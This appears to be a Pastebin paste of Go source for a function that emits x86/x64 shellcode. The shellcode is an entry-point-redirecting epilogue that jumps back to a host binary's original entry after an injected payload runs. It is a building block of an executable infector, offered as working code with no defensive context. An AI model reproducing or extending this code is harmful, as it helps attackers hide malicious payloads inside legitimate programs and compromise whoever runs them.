Advertisement
FlyFar

epiloguejmp.go

Jun 18th, 2023
1,496
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Go 2.53 KB | Cybersecurity | 0 0
  1. package main
  2.  
  3. import(
  4.     "encoding/binary"
  5.     "bytes"
  6. )
  7.  
  8. /*
  9.     x64 - pEntry uint64 / oEntry uint64
  10.     x86 - pEntry uint32 / oEntry uint32
  11. */
  12. func modEpilogue(pSize int32, pEntry interface{}, oEntry interface{}) []byte {
  13.     /*
  14.     ;Example of what the final payload can look like
  15.     epilog := []byte{
  16.         0xe8, 0x12, 0x00, 0x00, 0x00,       //call   401061 <get_eip>
  17.         0x48, 0x83, 0xe8, 0x4f,             //sub    $0x4f,%rax
  18.         0x48, 0x2d, 0xd1, 0x73, 0x01, 0x00, //sub    $0x173d1,%rax
  19.         0x48, 0x05, 0x20, 0x5b, 0x00, 0x00, //add    $0x5b20,%rax
  20.         0xff, 0xe0,                         //jmp    *%rax
  21.                                             //0000000000401061 <get_eip>:
  22.         0x48, 0x8b, 0x04, 0x24,             //mov    (%rsp),%rax
  23.         0xc3,                               //ret
  24.     }
  25.     */
  26.  
  27.     encPsize := make([]byte, 4)
  28.     binary.LittleEndian.PutUint32(encPsize, uint32(pSize))
  29.     var numZeros uint32 = 0
  30.     for _, b := range encPsize {
  31.         if b != 0x00 {
  32.             numZeros++
  33.         }
  34.     }
  35.  
  36.     var incOff uint32
  37.     switch pEntry.(type) {
  38.     case uint64:
  39.         incOff = 0x12
  40.     case uint32:
  41.         incOff = 0xf
  42.     }
  43.     incOff += (numZeros - 1)
  44.  
  45.     var shellcode bytes.Buffer;
  46.     shellcode.Write([]byte{0xe8}) //call instruction
  47.    
  48.     //encode the offset
  49.     encOff := make([]byte, 4)
  50.     binary.LittleEndian.PutUint32(encOff, incOff)
  51.  
  52.     //write offset for call instruction
  53.     shellcode.Write(encOff)
  54.  
  55.     // (x64) - sub rax, encPsize
  56.     // (x86) - sub eax, encPsize
  57.     switch oEntry.(type) {
  58.     case uint64:
  59.         shellcode.Write([]byte{0x48, 0x83, 0xe8})
  60.     case uint32:
  61.         shellcode.Write([]byte{0x83, 0xe8})
  62.     }
  63.     shellcode.Write(encPsize[:numZeros])
  64.    
  65.     //  (x64) - sub rax, pEntry
  66.     //  (x86) - sub eax, pEntry
  67.     encPentry := make([]byte, 4)
  68.     switch v := pEntry.(type) {
  69.     case uint64:
  70.         binary.LittleEndian.PutUint32(encPentry, uint32(v))
  71.         shellcode.Write([]byte{0x48, 0x2d})
  72.     case uint32:
  73.         binary.LittleEndian.PutUint32(encPentry, v)
  74.         shellcode.Write([]byte{0x2d})
  75.     }
  76.     shellcode.Write(encPentry)
  77.  
  78.     // (x64) - add rax, oEntry
  79.     // (x86) - add eax, oEntry
  80.     encOentry := make([]byte, 4)
  81.     switch v := oEntry.(type) {
  82.     case uint64:
  83.         binary.LittleEndian.PutUint32(encOentry, uint32(v))
  84.         shellcode.Write([]byte{0x48, 0x05})
  85.     case uint32:
  86.         binary.LittleEndian.PutUint32(encOentry, v)
  87.         shellcode.Write([]byte{0x05})
  88.     }
  89.     shellcode.Write(encOentry)
  90.  
  91.     switch oEntry.(type) {
  92.     case uint64:
  93.         /* --- write -- */
  94.         //jmp rax
  95.         //mov rax, [rsp]
  96.         //ret
  97.         shellcode.Write([]byte{0xff, 0xe0, 0x48, 0x8b, 0x04, 0x24, 0xc3})
  98.     case uint32:
  99.         /* --- write -- */
  100.         //jmp eax
  101.         //mov eax, [esp]
  102.         //ret
  103.         shellcode.Write([]byte{0xff, 0xe0, 0x8b, 0x04, 0x24, 0xc3})
  104.     }
  105.     return shellcode.Bytes()
  106. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement